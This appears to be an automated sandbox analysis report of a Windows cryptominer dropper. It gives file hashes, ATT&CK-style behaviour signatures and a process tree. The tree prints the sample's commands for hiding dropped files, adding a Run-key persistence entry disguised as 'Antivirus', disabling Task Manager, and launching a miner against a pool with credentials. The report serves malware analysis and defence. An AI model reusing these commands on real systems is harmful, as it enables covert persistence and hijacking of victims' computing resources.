Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/08/2024, 01:43

General

  • Target

    bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe

  • Size

    2.8MB

  • MD5

    bfe17800bf5f9d1c0e3e2f548c10441b

  • SHA1

    64791f65e1759bd0e4201d5e19e9a50e41ab83fa

  • SHA256

    f31b14069833b2ad38b746e4a32639b06fa06024129860da9f3c3c03a732a65e

  • SHA512

    35806a40f9929c04cd02fb90db5d503b77b317d40138f76d03f306cfda3bd09615f18d3da5d103a780ad53d0fa4cfd3f351b6e62144d95f379a32a0432e794fa

  • SSDEEP

    49152:9j+liOUidT2U0RDWKMRtTgpJQUxCC5AF:

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\561C.tmp\test.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost -n 5
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2296
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\run.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1228
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\bitcoin-miner.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2472
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\checker.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1352
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1116
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\software\microsoft\windows\currentversion\run /v Antivirus /t reg_sz /d "C:\Cache\checker.exe" /f
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:440
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
          4⤵
          • Disables RegEdit via registry modification
          • System Location Discovery: System Language Discovery
          PID:1488
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:648
        • C:\Cache\checker.exe
          checker.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1260
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\6E6C.tmp\checker.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2188
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2804
            • C:\Cache\run.exe
              C:\Cache\run.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2820
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\7427.tmp\run.bat" "
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2324
                • C:\Cache\bitcoin-miner.exe
                  bitcoin-miner.exe -a 5 -o http://pool.bitclockers.com:8332 -u s7eez -p kukuku -t 24
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:752
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2388
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1884
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2460
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1384
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2700
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:848

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Cache\result.txt

          Filesize

          2KB

          MD5

          3cc95b3eddc329167833433281d3add8

          SHA1

          4ddd84630787f7188cbd378c7074031979ed3473

          SHA256

          1dfa36f76ba469bad7844909554dea9a38f08f249d1ab083c141823cdbcbf90c

          SHA512

          dbf01025decf1fce762ff5a54569701dfa7fa3087e3857e3ea5899f8789e26ff8f86dbbff0f927740b9a7173b09aeab778f18ddc8bdeef1e8ff7804b5990b24b

        • C:\Cache\result.txt

          Filesize

          3KB

          MD5

          0c02efca61a7b62e3e45c0a9a3d0b70a

          SHA1

          52be63085e3dc72ae52071e6a37a7bcf440d10ca

          SHA256

          55e7b3e01c7b50a6c208da96135f2173107a2949a01a0a093d210d42499e82be

          SHA512

          1cf891cd54b53fc896613fc8a1582924c424856afb9c60367f38914a5e14c5ee6761612a80e6fcd93026185beb262f1804262c88a3dd4d1967ad1f107fd5b483

        • C:\Cache\result.txt

          Filesize

          3KB

          MD5

          405e9df3234fc3ab6de98b2b1a9c38a0

          SHA1

          821a57effe2817080c2efdc61a97fa092414a8ed

          SHA256

          099150523d202a2da9a9e88afb0915b5a449be941b19ffdfed167f2869dc979c

          SHA512

          7f2191b6582741d59d98d155414eb752a0a101765e6e8dd33c298b79ee30d4e619bd4cb07f4ca21254b64f8a342df935e681dff82c55378adb9fd6794bb19a25

        • C:\Users\Admin\AppData\Local\Temp\561C.tmp\test.bat

          Filesize

          659B

          MD5

          a159ff64bdd86119d3810c5c467b37c5

          SHA1

          5867c5f0e54451b45ef256b1ff6ed48fe7a6941d

          SHA256

          0c71339eea76e2ac439b5e590e009aee64ce086104eb3659b3466213cd4b6328

          SHA512

          a21b3518201652b27e1b0a61f374e339d3dc7482992d25fda94244fe3a9a3896f1bf19f4a64433a57ef2c72787ebcf604714660abfe8b41ad724302b4e445171

        • C:\Users\Admin\AppData\Local\Temp\6E6C.tmp\checker.bat

          Filesize

          165B

          MD5

          59685a7437a42b58e0f15e5305dfe403

          SHA1

          ed7b81ddfe8b904bf1b69a4d07e0f99cbff92ae6

          SHA256

          b7e7c6009e776e3ed1c0bb80da8e14190b034c5bcd6ccee5aec7f68df8beaed2

          SHA512

          6b6a5e91ba342adbecff9ff1d570c0275700f60c348780ca28bd6362896f3a3021c44bc555367cdcb62212277b1898661dec9c3674cbd668826fc1aa91286e3d

        • C:\Users\Admin\AppData\Local\Temp\7427.tmp\run.bat

          Filesize

          83B

          MD5

          172e76eea3bf6b1690e730de18c237ce

          SHA1

          1996dbcf5445d7758c8c32803cfa2184914067e4

          SHA256

          1cec973c8a11df697e35b0fce0006334a4bc6752edd51b908975027e5d353610

          SHA512

          fb0bf2690ec77b884da196d37d34e846e98b51973cdefd2e701febd412b35b8fa4e2d32e92ac8f23ccf4e1f9389373aa3c24aea5c48b0dc7af2c6c82aae66ab9

        • C:\Users\Admin\AppData\Local\Temp\bitcoin-miner.exe

          Filesize

          672KB

          MD5

          5e73d3f4cde7c8c3d8ea87372edf5771

          SHA1

          95871d7fe75e3393bf7ea9428aa23f5725ebd895

          SHA256

          7867dd91375e3cb9b1bc1bb1602c3d9c77041d6c04ed66783399f6708192efec

          SHA512

          d783dc2d5b8cf6c49193ea3bd778c4556338748a9a981772eea42ae38fa592d897c539c84671073a81950fddd963d5bb0c1543381b4d2af035997e9d6b41ef5e

        • C:\Users\Admin\AppData\Local\Temp\checker.exe

          Filesize

          21KB

          MD5

          441deed66676ea3d1b91c76d364965bc

          SHA1

          1234f568d5bc3e3b7310487adf55467cebae74d8

          SHA256

          8a4d75e0803c3fb2a3f5e3371754b8fe01d398fd8db8712f03280cc4d27289ea

          SHA512

          ff60d74c23e41f2dbb5ecb21526a1e111d7e160b8083e88f124c8b325238394def49d1f95c90171a485343f51765b3a8879026955bd6f419d0088b7dd439f9e4

        • C:\Users\Admin\AppData\Local\Temp\run.exe

          Filesize

          21KB

          MD5

          e36f9411cd577d2c4da6878781844f2c

          SHA1

          9a5568008416efe4cb91528a760491019216f386

          SHA256

          8bc058ca7adddc2f1b78ed605ebc218763688dfaf664983b7ed6801120ae98e0

          SHA512

          d52e0b5a2438e9b4f47facecd4e5235ad06d6c46d8812f11b30ae4575ed33e913336107807b3b01cf192507655c5f509391c86159de6b2b573592c2b17706ed0

        • memory/1260-92-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

        • memory/1260-49-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

        • memory/2536-45-0x0000000000130000-0x0000000000140000-memory.dmp

          Filesize

          64KB

        • memory/2536-48-0x0000000000130000-0x0000000000140000-memory.dmp

          Filesize

          64KB

        • memory/2668-69-0x0000000000270000-0x0000000000280000-memory.dmp

          Filesize

          64KB

        • memory/2668-71-0x0000000000270000-0x0000000000280000-memory.dmp

          Filesize

          64KB

        • memory/2708-26-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

        • memory/2708-0-0x00000000740A1000-0x00000000740A2000-memory.dmp

          Filesize

          4KB

        • memory/2708-2-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

        • memory/2708-1-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

        • memory/2820-94-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

        • memory/2920-15-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-65-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-6-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-7-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/2920-14-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-16-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-11-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-13-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

        • memory/2920-5-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB